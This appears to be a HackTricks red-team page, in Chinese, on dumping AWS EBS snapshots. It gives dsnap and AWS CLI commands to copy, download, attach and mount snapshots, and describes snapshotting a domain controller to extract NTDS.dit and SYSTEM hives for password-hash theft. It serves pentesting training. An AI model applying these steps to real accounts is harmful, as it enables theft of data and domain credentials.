AWS - EBS Snapshot Dump

学习和练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) 学习和练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过提交 PRs 分享黑客技巧到 HackTricks 和 HackTricks Cloud github 仓库。

本地检查快照

# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox

# Get snapshot from image
mkdir snap_wordir; cd snap_workdir
dsnap init
## Download a snapshot of the volume of that instance
## If no snapshot existed it will try to create one
dsnap get <instance-id>
dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
## Other way to get a snapshot
dsnap list #List snapshots
dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly

# Run with vagrant
IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
IMAGE="<download_file>.img" vagrant ssh #Access the VM
vagrant destroy #To destoy

# Run with docker
git clone https://github.com/RhinoSecurityLabs/dsnap.git
cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded

注意 dsnap 不允许你下载公共快照。要规避这一点，你可以在你的个人账户中复制该快照，然后下载：

# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"

# View the snapshot info
aws ec2 describe-snapshots --owner-ids self --region us-east-2

# Download the snapshot. The ID is the copy from your account
dsnap --region us-east-2 get snap-027da41be451109da

# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2

有关此技术的更多信息，请查看原始研究：https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/

你可以使用Pacu通过模块ebs__download_snapshots来完成此操作。

在AWS中检查快照

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

在你控制的EC2虚拟机中挂载它（必须与备份的副本在同一区域）：

步骤1：通过进入EC2 –> Volumes创建一个你喜欢的大小和类型的新卷。

要执行此操作，请遵循以下命令：

创建一个EBS卷以附加到EC2实例。
确保EBS卷和实例在同一区域。

步骤2：右键点击创建的卷，选择“attach volume”选项。

步骤3：从实例文本框中选择实例。

要执行此操作，请使用以下命令：

附加EBS卷。

步骤4：登录到EC2实例并使用命令lsblk列出可用磁盘。

步骤5：使用命令sudo file -s /dev/xvdf检查卷是否有数据。

如果上述命令的输出显示“/dev/xvdf: data”，则表示卷是空的。

步骤6：使用命令sudo mkfs -t ext4 /dev/xvdf将卷格式化为ext4文件系统。或者，你也可以使用命令sudo mkfs -t xfs /dev/xvdf使用xfs格式。请注意，你应该使用ext4或xfs之一。

步骤7：创建一个你选择的目录来挂载新的ext4卷。例如，你可以使用名称“newvolume”。

要执行此操作，请使用命令sudo mkdir /newvolume。

步骤8：使用命令sudo mount /dev/xvdf /newvolume/将卷挂载到“newvolume”目录。

步骤9：切换到“newvolume”目录并检查磁盘空间以验证卷挂载。

要执行此操作，请使用以下命令：

切换到/newvolume目录。
使用命令df -h .检查磁盘空间。此命令的输出应显示“newvolume”目录中的可用空间。

你可以使用Pacu的模块ebs__explore_snapshots来执行此操作。

在AWS中检查快照（使用cli）

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>

# Attach new volume to instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>

# mount the snapshot from within the VM

sudo file -s /dev/sdh
/dev/sdh: symbolic link to `xvdh'

sudo file -s /dev/xvdh
/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63

lsblk /dev/xvdh
NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
xvdh     202:112  0    8G  0 disk
├─xvdh1  202:113  0  7.9G  0 part
├─xvdh14 202:126  0    4M  0 part
└─xvdh15 202:127  0  106M  0 part

sudo mount /dev/xvdh1 /mnt

ls /mnt

Shadow Copy

任何拥有 EC2:CreateSnapshot 权限的 AWS 用户都可以通过创建域控制器的快照，将其挂载到他们控制的实例，并导出 NTDS.dit 和 SYSTEM 注册表配置单元文件来窃取所有域用户的哈希值，以便与 Impacket 的 secretsdump 项目一起使用。

你可以使用这个工具来自动化攻击：https://github.com/Static-Flow/CloudCopy 或者在创建快照后使用之前的技术之一。

References

https://devopscube.com/mount-ebs-volume-ec2-instance/

学习和练习 AWS Hacking：HackTricks Training AWS Red Team Expert (ARTE) 学习和练习 GCP Hacking：HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过提交 PRs 分享黑客技巧到 HackTricks 和 HackTricks Cloud github 仓库。

PreviousAWS - EC2, EBS, SSM & VPC Post Exploitation NextAWS - Malicious VPC Mirror

Last updated 1 month ago